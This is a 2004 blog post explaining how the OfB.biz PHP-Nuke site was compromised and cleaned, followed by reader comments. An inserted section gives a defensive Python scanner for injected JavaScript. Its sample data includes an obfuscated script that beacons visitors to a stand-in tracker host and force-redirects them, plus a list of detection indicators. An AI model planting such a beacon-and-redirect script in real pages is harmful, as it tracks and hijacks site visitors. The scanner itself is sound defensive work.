Open for Business Back Online, Hack Explained
On April 1, 2004, a single, carefully crafted URL was sent to OfB.biz, returning a set of encrypted strings. The same request was reissued in the midst of thousands of normal requests on April 2 and 7. The requests came from Tehran, Cairo and Sarajevo. Then there was a week of silence. Late on April 13, however, another string of requests came, this time from various ISPs in Tel Aviv.
The strings harvested the previous week were combined to form the administrative access cookie for PHP-Nuke. With that cookie in hand, the new requests inserted multiple superuser accounts, giving complete access to all of PHP-Nuke's functionality. The accounts were added systematically from different IP addresses over a period of several hours, going well into April 14. After creating these superuser accounts and moving the original superuser account to a semi-removable status, the perpetrator entered the block administrator and placed obfuscated JavaScript code, hidden next to the JavaScript code for the advertising banners.
The JavaScript code reported each visitor hit back to the attacker, tagged with a unique ID, and then forwarded the visitor to a pornographic web site before they knew anything had happened. The attack was complete. The attacker then moved on to other sites, defacing PCLinuxOnline on the same day and Linux and Main on April 15.
Three days later, I have hand-checked the nearly 300 articles on Open for Business, cleaned out the JavaScript and successfully brought OfB back online with a number of security patches. However, with this being the second time that the poor design of PHP-Nuke has allowed the site to be attacked, my days using PHP-Nuke are numbered. Assuming that SAFARI eventually is finished (I've been talking about that for how many years now?), I will be moving over to that and escaping this security mess forever.
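As an added example, not the author's code and not part of PHP-Nuke, here is a Python triage scanner of the kind that would have shortened the hand check of nearly 300 articles described above: it pulls every `<script>` body out of dumped content rows, unwraps percent-escapes and `String.fromCharCode()` wrappers, and flags scripts that load a script from an external host or force a redirect, which is what the injected block code described above did. The sample rows, host names and the `id` parameter are constructed for this example and are not taken from OfB.biz.

```python
"""Triage scanner for JavaScript injected into stored CMS content.

Extracts every <script> body from dumped HTML fields, peels common
obfuscation layers (%XX escapes, String.fromCharCode) and flags scripts
that beacon or redirect rather than render a banner.  All sample content
is constructed for this example; none of it comes from OfB.biz or PHP-Nuke.
"""
import re
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
PERCENT_RE = re.compile(r"%[0-9A-Fa-f]{2}")
# Only a <script src=...> pointing off-site counts, so banner <img> tags do not trip it.
EXTERNAL_SCRIPT_RE = re.compile(
    r"""<script\b[^>]*\bsrc\s*=\s*["']?(https?://[^"'\s>]+)""", re.IGNORECASE)

# Behaviours that mark a script as a beacon/redirector rather than a banner.
INDICATORS = {
    "unescape(": "percent-escaped payload",
    "eval(": "eval of constructed code",
    "String.fromCharCode": "char-code constructed string",
    "document.write": "script writes markup at load time",
    "location.replace": "forced navigation",
    "location.href": "forced navigation",
    "window.location": "forced navigation",
    "new Image": "tracking pixel / beacon",
}


def extract_scripts(html):
    """Return the bodies of all <script> elements in one stored HTML field."""
    return [m.group(1).strip() for m in SCRIPT_RE.finditer(html)]


def decode_layers(js, max_rounds=5):
    """Unwrap String.fromCharCode(...) and %XX escapes until nothing changes."""
    cur = js
    for _ in range(max_rounds):
        nxt = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(c)) for c in m.group(1).replace(" ", "").split(",") if c),
            cur)
        if PERCENT_RE.search(nxt):
            nxt = unquote(nxt)
        if nxt == cur:
            break
        cur = nxt
    return cur


def score_script(js):
    """Return (score, reasons); score is the number of distinct indicators hit."""
    decoded = decode_layers(js)
    reasons = set()
    for needle, why in INDICATORS.items():
        if needle in js or needle in decoded:
            reasons.add(why)
    # A body that is mostly %XX escapes is hiding something from a casual reader.
    if len(PERCENT_RE.findall(js)) * 3 > 0.3 * max(len(js), 1):
        reasons.add("mostly percent-escaped")
    for url in EXTERNAL_SCRIPT_RE.findall(decoded):
        reasons.add("loads external script " + url)
    return len(reasons), sorted(reasons)


def scan_content(rows, threshold=2):
    """rows: {row_id: stored_html}. Return scripts scoring at or above threshold."""
    findings = []
    for row_id, html in rows.items():
        for index, js in enumerate(extract_scripts(html)):
            score, reasons = score_script(js)
            if score >= threshold:
                findings.append({"id": row_id, "script_index": index, "score": score,
                                 "reasons": reasons, "decoded": decode_layers(js)})
    return findings


# Constructed sample rows, as if dumped from the CMS block and story tables.
# Hosts, the "id" parameter and the row names are invented for this example.
BANNER_JS = ('document.write(\'<a href="http://ads.example.org/click?id=7">'
             '<img src="http://ads.example.org/banner.gif" border="0"></a>\');')
INJECTED_JS = ("document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Ftracker.example.net"
               "%2Fhit.php%3Fid%3D1f3a9%22%3E%3C%2Fscript%3E'));"
               "setTimeout(\"window.location='http://redirect.example.net/'\",500);")
SAMPLE_ROWS = {
    "block:banner": '<center><script type="text/javascript">' + BANNER_JS + "</script></center>",
    "block:banner-tampered": ('<center><script type="text/javascript">' + BANNER_JS + "</script>"
                              '<script type="text/javascript">' + INJECTED_JS + "</script></center>"),
    "story:42": "<p>Plain article text with no script at all.</p>",
}

if __name__ == "__main__":
    for finding in scan_content(SAMPLE_ROWS):
        print(finding["id"], "script #%d" % finding["script_index"], finding["reasons"])
        print("   decoded:", finding["decoded"][:120])
```

Run stand-alone it prints only the tampered banner block: the legitimate banner script scores one indicator (`document.write`) and stays below the threshold, while the injected script scores four, including the decoded external `<script src=...>` host and the forced redirect. Treat the score as a sort order for manual review, not a verdict; the decoded text is what tells you where the beacon and redirect actually point.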
Join the Conversation
RE: Open for Business Back Online, Hack Explained
Thanks for explaining, notwithstanding my complete ignorance of PHP. So it was all about money via porn? Still sinister, though not as I expected. Such crooks are in the same class as spammers: they never really believe how deeply the majority despise what they offer. But if just one or two in a thousand takes the bait, it’s worth it to them.
Now what?
RE: Open for Business Back Online, Hack Explained
Nods head and pretends that he understands. So were you locked out of the program? Did you have to start from scratch and a backup? Are these people targeting a certain type of site or a certain topic? (I noticed Linux mentioned a lot.) Can I be a superuser? (That sounds like fun.)
RE: Open for Business Back Online, Hack Explained
Christopher: No, I’m not sure if they aimed to, but they never got around to locking me out… so I just went through and cleaned up the existing database. I’m not sure if they are targeting certain sites or not — most of the PHP-Nuke sites I frequent are GNU/Linux sites, so that might be it. Or, it could be someone familiar with GNU/Linux sites and aiming to take them down.
At any rate, superuser isn’t as much fun as it sounds. It just means you can post articles at OfB and add/delete users, etc. Of course, if you ever want to start writing about GNU/Linux…
Oh, interestingly enough, there was one more attack I caught that occurred apparently while the public face of the site was down, but before I applied security fixes. I eliminated that hacker and now I think all is good to go. Some more attacks came in today but failed.
RE: Open for Business Back Online, Hack Explained
So was it automated? I’m gonna have to guess that somehow it was, because that was an awful lot of useless work to forget to lock the real admin out. Seems rather silly of them unless it was all just for kicks.
RE: Open for Business Back Online, Hack Explained
I’m not sure. I tend to think it was semi-automated (i.e. they aimed at certain sites but had a preprogrammed routine to do it…).